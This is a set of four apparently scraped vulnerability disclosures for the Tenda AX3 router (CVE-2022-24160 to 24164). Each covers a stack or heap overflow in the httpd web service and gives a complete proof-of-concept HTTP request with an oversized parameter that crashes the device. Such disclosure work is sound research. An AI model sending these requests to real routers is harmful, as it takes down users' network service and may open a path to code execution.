CVE-2022-24164: my_vuln/40.md at main · pjqwudi/my_vuln

Tenda AX3 v16.03.12.10_CN was discovered to contain a stack overflow in the function saveParentControlInfo. This vulnerability allows attackers to cause a Denial of Service (DoS) via the time parameter.

**Tenda Vulnerability**

Vendor:Tenda

Product:AX3

Version:V16.03.12.10\_CN(Download Link:https://www.tenda.com.cn/download/detail-3238.html)

Type:Stack Overflow & Heap Overflow

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn

**Vulnerability description**

We found an stack overflow & heap overflow vulnerability in Tenda router with firmware which was released recently, allows remote attackers to crash the server.

**Stack Overflow & Heap Overflow**

In `httpd` binary:

In `saveParentControlInfo` function, `time` is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow, so we can control the `time` to execute arbitrary code.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_27/images/1.png)

As you can see here, the input has not been checked. In `compare_parentcontrol_time` function, the parameter `time` is directly copy to a local variable placed on the stack, which overrides the return address of the function, causing buffer overflow.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_27/images/2.png)

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

There is also a heap overflow vulnerability in the function get\_parentControl\_list\_Info.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_27/images/3.png)

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_27/images/4.png)

> There are many overflow vulnerabilities inside this function

**PoC**

We set `time` as **19%3A00-aaaaaaaaaaaaaaaaaaaaaaaaaaaa.......** , and the router will crash, such as:

POST /goform/saveParentControlInfo HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 273
Origin: http://192.168.1.1
Connection: close
Referer: http://192.168.1.1/parental\_control.html?random=0.12030911103673769&
Cookie: password=f5bb0c8de146c67b44babbf4e6584cc0ibccvb

deviceId=00%3A0c%3A29%3A32%3Aa0%3A89&deviceName=pjquwdi&enable=1&time=19%3A00-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&url\_enable=1&urls=www.baidu.com&day=1%2C1%2C1%2C1%2C1%2C1%2C1&limit\_type=0

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_27/images/5.png)

**Result**

The target router crashes and cannot provide services correctly and persistently.

CVE-2022-24162: my_vuln/27.md at main · pjqwudi/my_vuln

Tenda AX3 v16.03.12.10_CN was discovered to contain a stack overflow in the function formSetDeviceName. This vulnerability allows attackers to cause a Denial of Service (DoS) via the devName parameter.

**Tenda Vulnerability**

Vendor:Tenda

Product:AX3

Version:V16.03.12.10\_CN(Download Link:https://www.tenda.com.cn/download/detail-3238.html)

Type:Stack Overflow

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn

**Vulnerability description**

We found an stack overflow vulnerability in Tenda router with firmware which was released recently, allows remote attackers to crash the server.

**Stack Overflow**

In `httpd` binary:

In `formSetDeviceName` function, `devName` is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow, so we can control the `devName` to execute arbitrary code.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_32/images/1.png)

As you can see here, the input has not been checked. In `set_device_name` function, the parameter `devName` is directly copy to a local variable placed on the stack, which overrides the return address of the function, causing buffer overflow.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_32/images/2.png)

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

> The parameter `mac` does not cause a buffer overflow because its length is limited to 20 in the function `lower_mac`.

In `libcommonprod.so` binary:

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_32/images/3.png)

**PoC**

We set `devName` as **aaaaaaaaaaaaa.........** , and the router will crash, such as:

> The string needs to contain \\r, otherwise the vulnerability cannot be triggered

POST /goform/SetOnlineDevName HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 330
Origin: http://192.168.1.1
Connection: close
Referer: http://192.168.1.1/parental\_control.html?random=0.6900448104060756&
Cookie: password=f5bb0c8de146c67b44babbf4e6584cc0smscvb

devName=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&mac=e0:be:03:25:12:36

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_32/images/4.png)

**Result**

The target router crashes and cannot provide services correctly and persistently.

CVE-2022-24160: my_vuln/32.md at main · pjqwudi/my_vuln

Tenda AX3 v16.03.12.10_CN was discovered to contain a heap overflow in the function GetParentControlInfo. This vulnerability allows attackers to cause a Denial of Service (DoS) via the mac parameter.

**Tenda Vulnerability**

Vendor:Tenda

Product:AX3

Version:V16.03.12.10\_CN(Download Link:https://www.tenda.com.cn/download/detail-3238.html)

Type:Heap Overflow

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn

**Vulnerability description**

We found an heap overflow vulnerability in Tenda router with firmware which was released recently, allows remote attackers to crash the server.

**Heap Overflow**

In `httpd` binary:

In `GetParentControlInfo` function, `mac` is directly passed by the attacker, If this part of the data is too long, it will cause the heap overflow, so we can control the `mac` to crash the program.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_26/images/1.png)

As you can see here, the input has not been checked. In `GetParentControlInfo` function, the parameter `mac` is directly copy to a local variable placed on the heap, which overflow the heap and crash the program.

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

**PoC**

We set `mac` as **aaaaaaaaaaaaaaaaaaa.......** , and the router will crash, such as:

GET /goform/GetParentControlInfo?mac=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&random=0.9435881419838728 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://192.168.1.1/parental\_control.html?random=0.5578315870107804&
Cookie: password=f5bb0c8de146c67b44babbf4e6584cc0lwgcvb

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_26/images/2.png)

**Result**

The target router crashes and cannot provide services correctly and persistently.

CVE-2022-24161: my_vuln/26.md at main · pjqwudi/my_vuln

Tenda AX3 v16.03.12.10_CN was discovered to contain a stack overflow in the function formSetPPTPServer. This vulnerability allows attackers to cause a Denial of Service (DoS) via the startIp and endIp parameters.

**Tenda Vulnerability**

Vendor:Tenda

Product:AX3

Version:V16.03.12.10\_CN(Download Link:https://www.tenda.com.cn/download/detail-3238.html)

Type:Stack Overflow

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn

**Vulnerability description**

We found an stack overflow vulnerability in Tenda router with firmware which was released recently, allows remote attackers to crash the server.

**Stack Overflow**

In `httpd` binary:

In `formSetPPTPServer` function, `startIp、endIp` is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow, so we can control the `startIp、endIp` to execute arbitrary code.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_28/images/1.png)

As you can see here, the input has not been checked. In `formSetPPTPServer` function, the parameter `startIp、endIp` is directly copy to a local variable placed on the stack, which overrides the return address of the function, causing buffer overflow.

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

**PoC**

We set `startIp` as **aaaaaa............0.0.100** , and the router will crash, such as:

POST /goform/SetPptpServerCfg HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1062
Origin: http://192.168.1.1
Connection: close
Referer: http://192.168.1.1/pptp\_server.html?random=0.2812259468544036&
Cookie: password=f5bb0c8de146c67b44babbf4e6584cc0zrmcvb

serverEn=1&startIp=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.0.0.100&endIp=10.0.0.200&mppe=0&mppeOp=128

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_28/images/2.png)

**Result**

The target router crashes and cannot provide services correctly and persistently.

Tag

#ubuntu